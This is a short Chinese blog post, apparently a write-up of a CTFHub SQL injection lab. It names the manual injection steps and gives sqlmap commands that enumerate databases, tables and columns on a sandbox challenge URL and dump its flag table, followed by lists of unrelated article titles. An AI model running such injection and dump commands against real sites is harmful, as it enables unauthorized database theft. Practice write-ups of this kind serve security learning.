打开靶机

查看页面信息

查看回显位

查询数据库名

查询表名

查询字段

查询字段信息

使用sqlmap食用效果更佳

查数据库名

python2 sqlmap.py -u http://challenge-b6a3a184decf6636.sandbox.ctfhub.com:10080/?id=1 --dbs

查表名

python2 sqlmap.py -u http://challenge-b6a3a184decf6636.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables

查字段

python2 sqlmap.py -u http://challenge-b6a3a184decf6636.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns

dump数据

python2 sqlmap.py -u http://challenge-b6a3a184decf6636.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag -C flag --dump

最新文章

  1. yii框架的理解
  2. Android 线程更新UI报错 : Can't create handler inside thread that has not called Looper.prepare()
  3. Shell 编程基础之注意技巧
  4. WPS2013三合一全套精品视频教程-【word,excel,powerpoint】
  5. UVa 11762 - Race to 1
  6. ajax请求简写
  7. 【HDOJ】【3037】Saving Beans
  8. [LeetCode 111] - 二叉树的最小深度 (Minimum Depth of Binary Tree)
  9. 如何用python和苹果Turicreate学习框架来识别图像?
  10. 一个成功的 Git 分支模型(适用于商业应用开发)
  11. Python调用ansible API系列(一)获取资产信息
  12. Session variables lost after the call of Response.Redirect method
  13. PMS构造函数以及apk如何扫描
  14. Mac系统配置JDK环境变量
  15. Visual Studio 2010 出现关于ActivityLog.xml错误的解决方案
  16. jQuery 发送验证码倒计时按钮 复制代码
  17. javascript中父、子页面间调用
  18. 在word中输入任意角度旋转图片
  19. JavaScript-2.内置对象---简单脚本之弹出对话框显示当前时间 ---ShinePans
  20. Python Matplotlib绘图库 安装

热门文章

  1. zstd c++ string 压缩&解压
  2. SpringBoot基于EasyExcel解析Excel实现文件导出导入、读取写入
  3. druid数据源yml配置
  4. Vue-router hash模式微信登录授权验证,#号处理
  5. Shell脚本命令常用技巧
  6. Elasticsearch 学习二(请求流程).
  7. rest framework Serializer fields
  8. matplotlib之scatter
  9. PHP7.4.3的BUG导致微信公众号CURl上传文件的412错误
  10. 道高一丈,且看CWE4.2的新特性